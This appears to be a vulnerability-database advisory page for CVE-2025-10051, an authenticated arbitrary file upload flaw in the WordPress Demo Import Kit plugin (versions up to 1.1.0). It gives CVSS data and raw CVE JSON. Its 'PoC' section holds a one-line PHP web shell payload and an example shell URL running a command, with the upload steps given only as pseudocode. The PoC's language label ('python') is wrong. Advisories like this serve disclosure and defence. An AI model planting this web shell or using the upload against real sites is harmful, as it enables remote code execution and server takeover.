Security Vulnerability Report
中文
CVE-2025-10051 CVSS 7.2 HIGH

CVE-2025-10051

Published: 2025-10-15 09:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Demo Import Kit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.1.0 via the import functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Demo Import Kit <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-10051 - Demo Import Kit Arbitrary File Upload PoC * Description: Exploit for arbitrary file upload vulnerability in WordPress Demo Import Kit plugin (<= 1.1.0) * Requirements: Administrator-level access to the target WordPress site * Usage: php exploit.php <target_url> <username> <password> <command> */ // Simple Web Shell payload to be uploaded $webshell_content = '<?php if(isset($_REQUEST["cmd"])){system($_REQUEST["cmd"]);} ?>'; // Note: A real exploit would: // 1. Login to WordPress admin panel using provided credentials // 2. Obtain necessary cookies and nonces (e.g., _wpnonce) // 3. Navigate to the Demo Import Kit import page // 4. Upload a PHP file with malicious content through the import functionality // 5. Locate the uploaded file path on the server // 6. Execute commands via the uploaded web shell // The exploit flow in pseudocode: /* $session = login($target_url, $username, $password); $nonce = get_import_nonce($target_url, $session); $upload_response = upload_file($target_url, $session, $nonce, 'shell.php', $webshell_content); $shell_url = extract_shell_url($upload_response); $output = execute_command($shell_url, $command); echo $output; */ // Example web shell content that would be uploaded: echo "Web Shell Payload:\n"; echo $webshell_content . "\n\n"; echo "This shell would be uploaded to the server and accessed via:\n"; echo "http://target.com/wp-content/uploads/demo-import-kit/shell.php?cmd=id\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10051", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:36.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Demo Import Kit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.1.0 via the import functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/demo-import-kit/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/465f2fd1-9eb3-43ca-8acc-74acf6bcde1a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.